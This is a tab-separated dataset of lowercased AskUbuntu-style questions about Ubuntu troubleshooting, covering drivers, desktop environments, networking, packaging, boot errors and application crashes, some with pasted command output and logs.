94656	is ubuntu/unity more cpu or gpu intensive ?	the answer is really important . i want to know if it 's more cpu or gpu intensive i 'm choosing between sandy bridge and llano .
94659	add password to an existing zip file	is there a way to add a password to an existing .zip file in ubuntu ?
94664	uninstall unity without ubuntu-desktop and use gnome shell instead	when i try to remove unity in synaptic or ubuntu software center it says that it want to remove ubuntu-desktop too which depends on all desktop applications . but i do n't want to remove the whole desktop but only unity . is there a solution ?
94665	what is a program similar to winscp ?	in windows i use winscp to transfer files server-side . it has a very attractive feature that i like best : keeping remote folders up to date . this means , whenever my local file is changed , winscp will replace the same file on the server with this new file . could you suggest me software that support this feature ?
94676	is there a simple gui-based program available to join/combine mp3 files ?	i have an audio book on cd which when ripped to my hard drive has multiple chapters as individual mp3 files . is there a simple program that could combine them all , in order , into one big file ? i 'm aware of audacity but it seemed to involve a fair amount of cutting and pasting to get the job done , bearing in mind there are 30-40 chapters ! ( though of course i may have been doing it the long winded way ! ) . there appears to be command line options but i 'm not all that confident in using them . so not all that sure of using the possible solutions in this question : joining mp3 files losslessly
94679	how to copy files of an extension , only if the same file exist in the destination ?	it may sound strange , but i really want to copy only the existing files , so this files will be updated/overridden , and any new file will not be added . i want to copy files of a single extension . it works well with this script line : rsync -avm -- include='*.bak ' -f 'hide , ! */ ' /directory-to-be-backed-up/ /media/usb_stick but i also want that the file to be copied only if it already exist in the destiny ( overriding it ) . for example , i have this 3 files in /tmp/a : /tmp/a/1.h /tmp/a/2.h /tmp/a/internal/3.h and this 2 files in /tmp/b : /tmp/b/1.h /tmp/b/internal/3.h i would like to update/override the existing files in /tmp/b using the ones in /tmp/a , but not copy any new file ( like the /tmp/a/2.h ) . is there a way ?
94680	virtualbox gives incorrect keybindings	i installed the 11.10 virtualbox image from http : //virtualboxes.org/images/ubuntu/ on my windows 8 developer preview x64 machine running virtualbox 4.1.8 . i 've previously installed it manually from the .iso . unfortunately all the symbol keys are incorrectly mapped on the virtualbox image version . so i apt-get install dkms virtualbox-ose-guest-utils , and restarted . that did n't make a difference . so i updated all software through update manager , to no avail . after restarting , i installed the guest addons through the outer virtualbox options , then installed it within the guest . successful install ( updated by 0.0.2 versions ) , but no change in key bindings even after reboot . how do i fix my keybindings ? fyi : seamless mode only sort-of works .
94687	how to install oracle10g ?	i want to install oracle10g on my ubuntu 11.10 server but it has this error : e : unable to locate package oracle-xe
94689	how do i zoom out my desktop ?	i have recently updated to version 10.4 on my elonex webbook and now my desktop is zoomed in . how do i zoom out ?
94690	how do i share files between two computers connected to a router ?	i have a desktop and a laptop both connected by cables to a router . i thought the computers were supposed to show up in nautilus in the network folder . that way i could then easily share files between them . they do not .
94694	server stuck at black screen after reboot	i recently put together a new server running ubuntu server 11.10 and it 's all working great except for one little detail . whenever i run `` sudo reboot '' everything works fine until i get to the grub page , where it auto-selects ubuntu and then only displays a black screen . there is nothing showing on the screen , and i ca n't access the server with a keyboard . neither can i access it over ssh . if i hold the power button down and force the computer to shut down , it will boot in to ubuntu normally the next time . this only happens the time i run `` sudo reboot '' , and not the following i start it . as i said , i ca n't spawn a terminal on the server , not even if i connect a keyboard . it 's like it 's frozen . i thought maybe somebody here could help me , because i 've been trying to solve this for days . in case this is helpful , i 've got a raid5 running on the server , but i ca n't imagine it to be the root of the problem . edit : i forgot to write , but i also have a 64gb crucial m4 as my system disk , where ubuntu is installed . the raid is just for storage . these are the server specifications : motherboard : asus p8h67-m b3 cpu : intel core i3 2120 3,3ghz gpu : asus geforce engt520 memory : corsair xms3 ddr3 pc10666/1333mhz cl9 2x4gb hdd : 3x seagate barracuda green st2000dl003 64mb 2tb thanks in advance !
94698	getting the latest features on ubuntu daily builds	if i 've installed ubuntu 12.04 , do i constantly have to download a new daily build to get the lates features or do the updates will automatically add them ?
94713	prevent .deb package from being upgraded	i maintain a package on launchpad that releases approx every month . however , our new version is no longer compatible with the previous version , because of some fundamental changes . so version 2.8 should not be upgraded to 2.9 . i specifically want to prevent users from upgrading to 2.9 by mistake . instead if they want to upgrade , they should be forced to apt-get remove , and then apt-get install to get a fresh install . is there a way to specify this in the package description ? or am i better of creating a separate repository or changing the name of the package ?
94716	2 folders in sys/class/backlight ?	issue : backlight brightness does not change . more detail : brightness will not change , using both 'system settings- > screen ' , or fn keys ( brightness bar shows and moves , but screen brightness does not change ) . notcied a post in this thread ( http : //ubuntuforums.org/showthread.php ? t=1866283 ) about having multiple folders in sys- > class- > backlight ... i have two folders too ! 'intel_backlight ' and 'acpi_video0' using the function keys , alters the value in the acpi_video0 's 'brightness ' file - but does n't actually alter the brightness of the screen . if i add 'backlight=vendor ' in grub , my function keys then edit the value in the 'intel_backlight brightness file . - but again doesnt actually change the brightness of the screen . computer : fujitsu siemans pi2515 , intel integrated graphics , no hdd partition . already tried : -editing grub to contain : acpi_osi=linux acpi_backlight=vendor -http : //ubuntuguide.net/change-screen-brightness-with-fn-key-in-ubuntu-11-0410-10 -sudo apt-get install acpi - $ sudo setpci -s 00:02.0 f4.b=20 -brightness does not adjust in fallback mode either . -reinstalling os , using linux mint ( same problem ) . -upgrading and downgrading bios . many thanks for reading , i understand this problem may need a bit of a linux pro to sort . if anyones up for the challenge i 'll spend any amount of time being walked through this , posting results . do n't want to give up here !
94718	can we make active applications ( that do n't have assigned launcher icons already ) near the dash launcher/	when running an app that is not already defined as a launcher icon under the dash icon , a new icon always pop up at the bottom of the vertical string of assigned icons . is it possible to make the newly active icon pop up under the dash button , so new active program icons are on top and not the bottom of the list ?
94719	how do i change the default application window background ?	i still ca n't find a way of changing the default white color of applications window backgrounds . it does hurt my eyes and i used to adjust it so easily up to 10.04 . there was this post : how to change the background colour of a window ? , explaining how to tweak some things , but they do n't affect the white background . also another sufferer tried to ask the question how to change the window color ( default : white ) ? but it was closed ! please help .
94724	kubuntu kwin shortcuts do not work with the numpad	i am trying to map keys in kwin like meta + kp4 in kubuntu 11.04 . if numlock is on , it gets recorded as `` meta + 4 '' and then works with the 4 on the main keyboard , but not on the keypad . if numlock is off , it gets recorded as `` meta + left '' and then works with the left arrow on the main keyboard , but not on the keypad . i want it to work on the keypad ! maybe there is some option in the keyboard settings ... ?
94729	why am i not given a gui after installing ubuntu-desktop in ubuntu server ?	i installed the ubuntu-desktop ( apt-get install ubuntu-desktop ) but it does not show the gui and it is not changing . it installed without any problem and i do n't know why it does not work . i select this on the logon screen : ubuntu , with linux 3.0.0-12-generic-pa and i used this version .
94730	picasa3 `` shop '' icon does not work since upgrading to 11.10	i have 2 computers with 11.10 and 2 computers with 11.04 . since up grading 2 computers to 11.04 the picasa3 `` shop '' icon does not work . when clicking on the `` shop '' icon to upload/order prints a window opens from which you select the vendor ( walgreens , snapfish , kodak , etc ) to order prints . after selecting a vendor a new `` orderprints/login '' window should open . instead i get an error message `` failed to begin upload process . please try again later . '' additionally in the lower right where upload progress is normally shown there is a message `` failed to download configuration file . '' this happens regardless of the vendor chosen . i have used picasa 3.0 and 3.8 with the same results . the problem only began when i upgraded to 11.10 .
94731	how do i turn off nvidia high performance mode ?	i am new to ubuntu 11.10 and never touched linux until today . i installed ubuntu alongside with windows 7 . i have an issue with my laptop overheating and freezing when it uses the high performance gpu graphics mode ( hybrid card ) . it is an easy fix for windows 7 . i simply set the graphics mode manually to the low performance integrated graphics ( save power ) mode using advanced power settings . in ubuntu , i 'm stumped at how to do this . when using ubuntu , my laptop is showing the same symptoms as it did without the fix for windows . i have the nvidia graphics driver installed for windows which allows me to see which mode i am in . i downloaded it off of my laptop 's website ( asus ) . they do not offer driver downloads for linux . screenshot of power settings in windows 7
94734	what is the `` templates '' folder in the home directory for ?	for as long as i can remember , every time i install ubuntu there is a folder in the home directory called `` templates . '' i 've always just deleted it , but i 'm curious : what 's it supposed to be used for , and why is it in the default install ?
94735	how do i set up pulseaudio to work in multi-seat ?	how do i set up pulseaudio for a two user multi-seat setup on ubuntu 10.04lts ? i have a hda intel device . i was wondering if it were possible to use the separate sound outputs to different seats . i have four outputs and two inputs ; microphone and line-in . is it possible to use this one device or do i have to get a separate sound card ?
94736	how add space to my home folder ?	i 'm new to ubuntu and i need help , i created a partition for my folder of 2gb but i 'm determined to stay with linux . i want to delete my other two ntfs partitions that i have one for my files and one for windows 7 . the problem is that i do n't want ro delete any of my photos or documents . what can i do ? please help me i do n't know so much about this but i like the operating system , the problem is that i fear losing my information .
94737	mounting & unmounting network shares on a mobile laptop	i have no problem mounting my shares ( fstab or gigolo ) . what i looking for is a way to automatically unmount the shares when i disconnect from the network and reconnect when i return . gigolo seems close . it reconnects fine , but i still seem to have to manually disconnect from each share individually .
94738	can someone tell me how to install reaver-wps ?	here is the webpage http : //code.google.com/p/reaver-wps/ can someone help me install it so i can play around with it ?
94740	should i switch to xubuntu for better flash video performance ?	i have hp mini 2133 netbook , with 1200mhz processor and 2gb of ram . i am currently using the normal ubuntu . but , flash videos ( on youtube , etc . ) do not play smoothly . i tried all optimizations , but the videos still do n't play smoothly . will changing to xubuntu help play videos faster ? i have the doubt because i am not sure whether the smoothness of flash videos depends on processor speed or ram size . thanks in advance .
94742	broadcom 4331 card sees wireless networks but ca n't make a connection	i followed the steps to get the broadcom 4331 card working on ubuntu 11.10 . you know where you dont use ndiswrapper , and you patch the kernel and stuff . okay so i did this . good news : ubuntu sees my card now ! ! i can see every wireless network ever and pick whatever one i want . so my card can find connections bad news : it cant make a connection . not even to google . it will sit there for half an hour trying and failing to connect . i will not however that on bootup this morning i was able to establish a connection for like 3 minutes so maybe theres something in the process of booting up that interferes after it loads ? sorry this is so long , i just wanted to be thorough .
94754	how to enable hibernation ?	in ubuntu 12.04 and newer , hibernation has been disabled by default in policykit . how can i enable this back ?
94757	how can i contribute to ubuntu 12.04 ?	i 'm a noob , but i want to help , i want to be apart of ubuntu . what can i do to learn , or help with the development of ubuntu 12.04 ?
94768	11.10 install hangs at different places	i 've been trying to install oneiric for some time now , and i 've looked everywhere for a solution to the problems i 've been having . so far , i 've attempted four times to install it , so now i 'm up to a point of panic . so i grabbed the 11.10 x64 iso from the website , and after verifying that the md5 hash is correct , i burned that onto my last remaining clean cd . on my first attempt , everything went perfectly up to the middle of the installation , and the progress bar stopped when it said : `` configuring target system . '' i could do everything else , only the installation seemed to have stopped . after i googled my problem , i went and used the `` check disc for errors '' option , which said everything was fine . then i tried the installation again , only this time , i selected `` install ubuntu now '' instead of the `` try before installing '' . again , the same problem . my second and third tries did n't even reach the installation phase . it just stopped at the 5 blinking dots and never went any further . i used the same non-rewritable cd for all the attempts , as the error check did n't show any problems and because i 'm currently out of usable cds . system : core i3 cpu @ 3.4 ghz , 500 gb hdd ( 250g used for win7 , 70g used for preexisting system partitions , 180g unallocated ) .
94770	internet slow on ubuntu but not windows using a rtl8111	i have just installed a dual boot windows7 /ubuntu 11.10 and the internet is much slower than windows . i have read the post here and tried the solutions presented and none have worked . here is what i am dealing with ; in windows my internet is as normal , nice and fast . however in ubuntu on my new system my internet is super slow ( here it is important to note that my other system ubuntu has the same speeds as windows on this system ) . i have installed all of the updates and am using the latest stable google chrome and my speedtest results are way lower . ( upload times out and eventually fails , however before that happens ping is 10ms and download is < 5meg ) . the difference is really felt when downloading anything , including updates . my system specs are as follows : motherboard : asus p8z68-v lx cpu : intel i5 2500k ram : corsair vengeance blue 8gb ( 4x4gb ) ssd : ocz vertex 3 60gb i am using the onboard lan . drivers were installed from the cd provided with the motherboard . i installed the drivers in windows ( windows was installed first ) . ubuntu did not require me to install any new drivers for the internet to work ( and by work i mean i can get a connection , albeit intermittent and slow ) . i have read people having difficulties with the uefi bios but never internet speeds . any help diagnosing my problem would be greatly appreciated . rdl @ rdl-home-ubuntu : ~ $ ethtool -s eth0 speed 1000 duplex full autoneg off can not set new settings : operation not permitted not setting speed not setting duplex not setting autoneg rdl @ rdl-home-ubuntu : ~ $ ifconfig eth0 |grep errors rx packets:14632 errors:0 dropped:14632 overruns:0 frame:14632 tx packets:14094 errors:0 dropped:297 overruns:0 carrier:0 running the first command as sudo only changes operation not permitted to invalid argument here is the output of sudo ethtool eth0 settings for eth0 : supported ports : [ tp mii ] supported link modes : 10baset/half 10baset/full 100baset/half 100baset/full 1000baset/half 1000baset/full supports auto-negotiation : yes advertised link modes : 10baset/half 10baset/full 100baset/half 100baset/full 1000baset/half 1000baset/full advertised pause frame use : symmetric receive-only advertised auto-negotiation : yes link partner advertised link modes : 10baset/half 10baset/full 100baset/half 100baset/full 1000baset/full link partner advertised pause frame use : symmetric receive-only link partner advertised auto-negotiation : yes speed : 1000mb/s duplex : full port : mii phyad : 0 transceiver : internal auto-negotiation : on supports wake-on : pumbg wake-on : g current message level : 0x00000033 ( 51 ) drv probe ifdown ifup link detected : yes and after i run sudo ethtool -s eth0 speed 100 duplex full autoneg off settings for eth0 : supported ports : [ tp mii ] supported link modes : 10baset/half 10baset/full 100baset/half 100baset/full 1000baset/half 1000baset/full supports auto-negotiation : yes advertised link modes : not reported advertised pause frame use : no advertised auto-negotiation : no speed : 100mb/s duplex : full port : mii phyad : 0 transceiver : internal auto-negotiation : off supports wake-on : pumbg wake-on : g current message level : 0x00000033 ( 51 ) drv probe ifdown ifup link detected : yes problem still persists .
94772	how to get gnome shell calendar to sync with google calendar with thunderbird installed ?	on gnome shell , i want to use the calendar and have it synced with my google calendar account , but i have thunderbird on my computer . i have seen a couple of posts making thunderbird default through the means of the terminal , but those changes did not effect the calendar on the desktop panel . i have used evolution in the past , and i never really liked it , but will conform to it if necessary for the ease of having google calendar sync .
94773	controlling window placement in unity with twinview	i am running a system running ubuntu oneric where i have a dvi monitor and an hdtv as my screens . they are set up using nvidia twinview . the monitor and tv are not side by side and the intent is to drag movies to the tv and then full screen it . the problem is that windows often open on the tv which i can not normally view while sitting at the computer . what is the simplest way to tell unity to open windows on a specific monitor exclusively ? note that i have only 1 hdmi connector so swapping the cables for the tv and the monitor is not an option . note : it is not always opening in this way but eg . when a website open up a confirmation dialog it always opens on the tv .
94774	what does it mean when there is a path like /dir/dir/program.attribute ?	in the question above i was trying to pose an example . i do n't know how effective i was in doing so ... i just want to understand how there can be what appear to be `` hidden '' files that exist . are they in fact hidden ? or are they attributes of a program ? how does one access all the .files ? any information would be enlightening . thanks in advance !
94776	opening a file opens the folder the file is in , not the file itself	whenever i try to open a file ( such as an .odt , or .doc ) from say , the dash or the firefox downloads , ubuntu 11.10 opens nautilus to the the folder where the file is , rather than just going to the application and loading the file straight away . in previous releases , when i clicked on a downloaded file , it just went straight to libreoffice , and it was fine . this is adding a superfluous step in the process . how do i associate the correct extensions ?
94779	can you use backup of one machine on a different machine ?	i do n't have fancy directory seperation . i have a desktop and laptop , and for the last few months i did a lot of work on my laptop . i do n't want to waste my time installing and configuring on my desktop . can i use the laptop 's backup on the desktop ? i know the potential concerns are drivers . how can i deal with such issue ? ( both are ubuntu 11.04 ) thanks .
94780	what are dot-files ?	i am having a hard time grasping what dot-files are or what they are for . are they directories ? how do i navigate to them ? thank you !
94787	importing contacts from dotproject	i have a bazoodle of contacts in a dotproject csv file . i 'd really like to import these into u1 ( maybe via evolution ) . i can tell which fields are what ( e.g. , what 's last name , etc . ) in the dotproject file , but i do n't know how to tell , e.g. , evolution what 's what so i can import them . has anyone done this , or know how ? i 've looked around to no avail ! thanks
94789	why is ubuntu 11.10 64bit using all my memory ?	i have a sony vaio vpcz122gx with 4gb ram , nvidia cards . i install ubuntu 11.10 64 bit . i am currently open : 1 tab firefox , virtual box with 1 winxp ~700 ram , 1 terminal top . that 's all . but memory used is 3.5 gb . i think there must be memory leak while i can see in top : virtualbox ( 2 process : 696mb + 37mb ) , firefox 33mb . can you help me to fix it . i try googling an searching in askubuntu but no luck .
94791	how do i change the vlc icon on the launcher ?	i am trying to change the default orange cone icon for the vlc media player on the unity bar in 11.10 . i have tried following similar posts in this forum , but without any luck . i changed the vlc.png icon i found in the /usr/share/icons/hicolor/256x256/apps directory ( which i assume is the icon used on the unity bar ) by copying a different .png file to it with the same name . it is also a 256x256 pixel .png file . i restarted ubuntu and the orange cone is still there . i 've read tidbits online about having to recompile the program or something , so i do n't know if this is more complicated a process than i assumed . i 'd also like to be able to do this for other programs , but this one specifically ( for now at least ) . i 'd greatly appreciate any suggestions ! thanks ! i updated my icon cache and the vlc icon is changed in dash , but not when i place it on the unity bar . i 've noticed that certain applications have icons stored in different directories and i 'm wondering if i 'm missing something . i tried out a new icon for google chrome and that one worked , but vlc wo n't . well i tried placing an icon in 128x128 and that did n't work either . is it possible the icon is some how hardcoded into the program ? i 've also now succesfully changed firefox 's icon as well ... so i do n't think i 'm doing something wrong
94796	live disk session installer hangs	so here 's the long story , win7 updated itself , broke its ability to boot . i use the windows repair session , and that breaks grub . now i 'm running from an ubuntu live disk , have tried multiple times to fix grub by both using the boot repair utility at : https : //help.ubuntu.com/community/boot-repair that did n't work . boot repair returns error message error : /sda/current_mbr.img does not exist . mbr could not be restored . boot info summary : = > no boot loader is installed in the mbr of /dev/sda . = > syslinux mbr ( 4.04 and higher ) is installed in the mbr of /dev/sdb . sda1 : file system : ntfs boot sector type : windows vista/7 boot sector info : no errors found in the boot parameter block . operating system : boot files : /bootmgr /boot/bcd sda2 : file system : ntfs boot sector type : windows vista/7 boot sector info : no errors found in the boot parameter block . operating system : boot files : /bootmgr /boot/bcd so i now i 've tried installing ubuntu a dozen times . the installer hangs on the `` praparing to install ubuntu '' window , after i press continue . after 15 min of letting the installation hang , i got a popup message . ? ? ? 2125573120 4032594432 4032593920 ? ? ? . i press ok , it reappears . i press x , it reappears . can anyone offer a possible solution ?
94799	banshee wo n't start unless run as sudo or -debug	i have no idea what is going on , i just made a fresh install of ubuntu and then after a reboot banshee wo n't start . i began to poke around the forums and then tried running it as sudo and with -debug , both of which get it to start , but with this error [ info 21:21:37.788 ] running banshee 2.2.1 : [ ubuntu 11.10 ( linux-gnu , x86_64 ) @ 2011-12-19 14:58:04 utc ] ( banshee:9910 ) : gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , ( banshee:9910 ) : gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , ( banshee:9910 ) : gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , ( banshee:9910 ) : gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , [ warn 21:21:38.332 ] dbus support could not be started . disabling for this session . - system.argumentnullexception : argument can not be null . parameter name : address ( in `dbus-sharp ' ) at dbus.bus.open ( system.string address ) [ 0x00000 ] in < filename unknown > :0 at dbus.bus.get_session ( ) [ 0x00000 ] in < filename unknown > :0 system.exception : unable to open the session message bus . ( in `dbus-sharp ' ) at dbus.bus.get_session ( ) [ 0x00000 ] in < filename unknown > :0 at dbus.busg.init ( ) [ 0x00000 ] in < filename unknown > :0 at banshee.servicestack.dbusconnection.connect ( system.string servicename , boolean init ) [ 0x00000 ] in < filename unknown > :0 at banshee.servicestack.dbusconnection.connect ( system.string servicename ) [ 0x00000 ] in < filename unknown > :0 [ info 21:21:39.748 ] updating web proxy from gconf [ warn 21:21:41.085 ] caught an exception - system.argumentnullexception : argument can not be null . parameter name : address ( in `dbus-sharp ' ) at dbus.bus.open ( system.string address ) [ 0x00000 ] in < filename unknown > :0 at dbus.bus.get_session ( ) [ 0x00000 ] in < filename unknown > :0 [ warn 21:21:41.085 ] extension `banshee.soundmenu.soundmenuservice ' not started : unable to open the session message bus . [ warn 21:21:41.087 ] caught an exception - system.applicationexception : no support gnome settings daemon could be reached . ( in `banshee.multimediakeys ' ) at banshee.multimediakeys.multimediakeysservice.banshee.servicestack.iextensionservice.initialize ( ) [ 0x00000 ] in < filename unknown > :0 at banshee.servicestack.servicemanager.startextension ( mono.addins.typeextensionnode node ) [ 0x00000 ] in < filename unknown > :0 [ warn 21:21:41.087 ] extension `banshee.multimediakeys.multimediakeysservice ' not started : no support gnome settings daemon could be reached . ( banshee:9910 ) : gtk-warning ** : refusing to add non-unique action 'closeaction ' to action group 'global' [ warn 21:21:41.151 ] caught an exception - system.argumentnullexception : argument can not be null . parameter name : address ( in `dbus-sharp ' ) at dbus.bus.open ( system.string address ) [ 0x00000 ] in < filename unknown > :0 at dbus.bus.get_session ( ) [ 0x00000 ] in < filename unknown > :0 [ warn 21:21:41.151 ] extension `banshee.soundmenu.soundmenuservice ' not started : unable to open the session message bus . [ warn 21:21:41.151 ] caught an exception - system.applicationexception : no support gnome settings daemon could be reached . ( in `banshee.multimediakeys ' ) at banshee.multimediakeys.multimediakeysservice.banshee.servicestack.iextensionservice.initialize ( ) [ 0x00000 ] in < filename unknown > :0 at banshee.servicestack.servicemanager.startextension ( mono.addins.typeextensionnode node ) [ 0x00000 ] in < filename unknown > :0 [ warn 21:21:41.152 ] extension `banshee.multimediakeys.multimediakeysservice ' not started : no support gnome settings daemon could be reached . [ info 21:21:41.155 ] all services are started 2.819477 [ info 21:21:41.776 ] amazonmp3 store redirect url : https : //one.ubuntu.com/music/store/amz/ [ info 21:21:42.438 ] nereid client started [ info 21:21:42.597 ] gstreamer version 0.10.35.0 , gapless : true , replaygain : false ( banshee:9910 ) : gtk-warning ** : attempting to store changes into `/root/.local/share/recently-used.xbel ' , but failed : failed to create file '/root/.local/share/recently-used.xbel.ul3g7v ' : no such file or directory please do help , i would love to be able to run banshee . edit : i ran banshee again regularly ( as recommended by cosmorogers ) , without sudo or -debug and got a different readout : [ info 06:58:41.576 ] running banshee 2.2.1 : [ ubuntu 11.10 ( linux-gnu , x86_64 ) @ 2011-12-19 14:58:04 utc ] ( banshee:2111 ) : gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , ( banshee:2111 ) : gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , ( banshee:2111 ) : gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , ( banshee:2111 ) : gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' ,
94802	getting grub error 19 after booting	i installed ubuntu 11.10 , installation completed successfully . when i remove boot device and restart pc , on loading grub gives `` error 19 . ''
94803	why does banshee always hang when started ?	without fail , banshee hangs and turns dark for a few seconds every single time it starts up for the first time . using 11.10 . after the first few days of my 11.10 installation , banshee did n't do that . ( could it be clashing with some other installed application ? i have zim notes and weather indicator and system monitor indicator added . ) why does this happen and how can it be fixed ? ( on a related note , banshee refuses to start up if my iphone is already plugged in . it opens and then immediately closes . the workaround , i 've found , is to unplug my iphone and then start up banshee , followed by plugging in my iphone , which seems to keep banshee from not crashing . )
94806	is there a hdaps extension of gnome shell ?	hdaps is a hard disk protect implement in thinkpad t and w series . my computer is thinkpad w500 . how to use hdaps in gnome shell ? thanks
94808	how to install package from newer distribution ?	i have ubuntu 10 server and want to update a package to newer version ( update rrdtool from 1.3.8 to current 1.4.5 ) . what should i do ? download and build sources or get package from newer distribution ? and how to do that ?
94810	compiling for 64bit file access	i 've reviewed a number of answers for compiling code to make it read/write files beyond the 4gb max allowed by 32bit file offsets . i 'm not having luck with any of the `` simple '' solutions that i 'm finding . the gist is i 've got ubuntu server 11.10 running on a small laptop ( 32 bit intel architecture ) . i 'm trying to read a unicode file that is 343868522737 bytes in size ( 0x50102940f1 ) . the ubuntu machine keeps thinking it is much smaller ( 0x102940f1 ) which turns out to be only the lower 32 bits of a true 64bit sized file . i wrote a small program that i 've compiled on a macos and on the ubuntu box . the mac seems to behave correctly , the ubuntu box does not . the small program is below . while i 've commented out a block of code , that is really only necessary for the mac . ubuntu environment will compile both blocks of code fine - and generates exactly the same response for both blocks . // necessary for ubuntu build ? # define _largefile_source # define _largefile64_source # define _file_offset_bits 64 // # include < features.h > // finish ubuntu # include < stdio.h > # include < stdlib.h > # include < errno.h > # include < string.h > # include < limits.h > # include < wchar.h > # include < wctype.h > # include < locale.h > // ubuntu version off64_t filemaxlen ( file* fin ) { off64_t fmaxlen = 0 ; if ( ( fin ! =null ) & & ( fseeko64 ( fin,0 , seek_end ) == 0 ) ) { fmaxlen = ftello64 ( fin ) ; fprintf ( stdout , '' filemaxlen ( ) : file length is : % # lx \n '' , ( long unsigned int ) fmaxlen ) ; fseeko64 ( fin,0 , seek_set ) ; } } // mac os version //off_t filemaxlen ( file* fin ) { // off_t fmaxlen = 0 ; // if ( ( fin ! =null ) & & ( fseeko ( fin,0 , seek_end ) == 0 ) ) { // fmaxlen = ftello ( fin ) ; // fprintf ( stdout , '' filemaxlen ( ) : file length is : % # lx \n '' , ( long unsigned int ) fmaxlen ) ; // fseeko ( fin,0 , seek_set ) ; // } // } main ( int argc , char* argv [ ] ) { char fname [ 255 ] ; char *locale ; file* f = null ; locale = setlocale ( lc_all , `` '' ) ; if ( argc > =2 ) { // get the file for segmenting memset ( fname , '\0 ' , 255 ) ; sprintf ( fname , '' % s '' , argv [ 1 ] ) ; fprintf ( stdout , '' opening : % s\n '' , fname ) ; f = fopen ( fname , '' r '' ) ; filemaxlen ( f ) ; fprintf ( stdout , '' done ! \n '' ) ; } else { fprintf ( stdout , '' need a filename\n '' ) ; } } save the snippet as file_test.c , then the compile is really simple . gcc file_test.c then run the a.out any suggestions for getting this code to recognize files beyond that 32bit boundary ? at this point i 'm simply stumped .
94812	how do i recover my applets / settings in the gnome fallback session after a 11.10 upgrade ?	just upgrade to 11.10 ( from 11.04 ) . waited a couple of months to get a `` safer '' version . unity comes by default - ok . since i can not stand unity , being an old-time ubuntu user and having a few applets / shortcuts on the top bar ( like cpu , mem monitoring , start a bunch of apps ... ) , i did apt-get install gnome-session-fallback and chose ubuntu classic in the login menu . works . but ... the top bar is now almost empty , all my icons disappeared , no more monitoring ... not mentioning the admin menus ... how can i recover all the icons and menus from my before-upgrade era ? edit and also , where can i find the system monitoring applets for gnome 3 ? ( the 11.04 gnome 2 ones do not work anymore )
94817	what happens during a package upgrade ?	i recently started building ubuntu packages for my software on launchpad . they are pretty simple ; most of them just contain some files and scripts that are trigged through the .install .preinst .postinst .prerm and .postrm files . installation and removing seems to work ok . however , upgrading from one version to the next is tricky . what exactly happens when a package is being upgraded ? is it the same thing as uninstalling the previous version and installing the new version ? are all the files from the previous packages removed , and replaced with the files in the .install list from the new package ? are all of the .prerm , postrm , preinst , postinst scripts executed ? how do i distinguish stuff that should only happen during a 'new install ' and an upgrade ?
94825	java script functionality not working in firefox on linux	i have developed a project in asp.net which contains javascript functionality as well . the application is working as expected in windows with all the browsers . but i am facing issues with linux os . wherever the javascript has been added , that functionality will not work . i am not receiving any error as well . kindly help me as soon as possible to sort this out as this is very urgent . thank you .
94826	11.10 fresh install , no visual effects	i just installed 11.10 . the menu bar and windows do n't have drop shadows , and the menu bar is still visible/opaque when i click on the dash home button . my graphics card is a geforce fx5950 ultra . any advice ? thanks
94827	i hate orange . it is everywhere . can someone help me replace all the orange gui with purple ?	i know this is a really silly question but it is bothering me so badly . everytime i open a window to browse my files , every time i highlight something , or click , or select . it is orange . can someone please help me ? i know of gnome shell extension themes but i actually ( surprise , surprise ) really like unity now that ive used it . so i am wanting a unity theme that also changes the native default of orange , orange , everywhere . but i dont know how to do this . i do not want to see orange anywhere anymore . purple and grey is preferred . sorry this is kinda dumb but it irritates me . please help .
94831	stuck at 0 % [ waiting for headers ] ( apt )	on googling this error it seems that a lot of people are having this issue . apt-get upgrade hangs at 0 % [ waiting for headers ] apt-get install apache2 hangs at 0 % [ waiting for headers ] . some apt-get commands are working , but only certain packages . any ideas ? i do n't think this is an issue with slow repos because i 've had it up for a long while and it has n't budged from 0 % . i have edited sources.list but i removed the lines i added when this issue presented itself and it has n't made a difference . any clues would be really useful . thank you
94833	ubuntu livecd , editing xorg.conf	someone has edited wrongly my xorg.conf file in /etc/x11/xorg.conf and so my computer wont show anything , just a blank screen.i want to be able to edit the xorg.conf file and delete all the changes made . i have put in my livecd and i can see my documents from the broken installation and also the xorg.conf file and the changes that were made but the file is read only . how can i edit this xorg.conf and delete the changes that were made ? .
94838	with dual-monitor setup , is it really required to have nvidia software installed ?	so far i 'm running the default novau software and have not tried installing the nvidia 's software via `` additional software '' . i have dual-monitor setup and so wanted to know whether there is going to be some noticeable improvement by installing the proprietary software ?
94848	how do i disable pasting when clicking the middle mouse button/wheel ?	i use the mouse wheel a lot to scroll up and down in my documents and files . having moved from windows , i did n't realise that the middle mouse button/wheel , when clicked , pastes highlighted text where the mouse is pointing . i 've been hit with this several time , where my scripts have failed because of a paste that takes me a while to discover . after several attempts at disabling the middle mouse button , i succeedded with : xmodmap -e `` pointer = 1 25 3 4 5 6 7 8 9 '' i found this on this site , which also states how to persist it . the problem with this feature , is that i rely on other elements of clicking the middle mouse button such as opening links in a new tab or closing a tab in my browser ( to name 2 of a few ) . it is annoying me that i have lost these functions . how can i disable pasting but keep all the other uses of middle mouse button clicking ? * please note i am reasonably new to ubuntu and linux and have also read about patching the kernel , but i do n't feel confident doing this ! ! *
94851	how do i get nautilus to handle the desktop succesfully in gnome shell ?	in this question , i asked how to enable desktop management in gnome shell . even though i managed to enable it , i ever since had this issue : note that the background is a distortion of my gdm login screen background and that there are no items on the desktop . the desktop backrground and items reappear normally as soon as nautilus is opened , however executing nautilus -q as a startup process does n't restore it . it is minor , but an annoyance nonetheless . thanks for your contributions !
94852	disable ati radeon hd6470 in dell vostro 3350 and use integrated intel in core i5	at the moment ati radeon hd6470 has n't working proprietary driver . open source driver works not well too : the card heats and cooler works very loud and notebook becomes hot . i would like to use integrated intel 's video card until this problem be solved , but i do n't know how to switch to it and if it will work well with external monitor through vga port .
94854	how do i turn off audio echo from microphone to local speakers ?	from 2 microphone inputs i have only one in use . when i talk into my usb microphone the audio echoes back to my local speakers ( my `` hello '' is getting looped back instantly ) . how do i turn this off ? additional information on how to do this from command line ( for a remote machine ) would be appreciated .
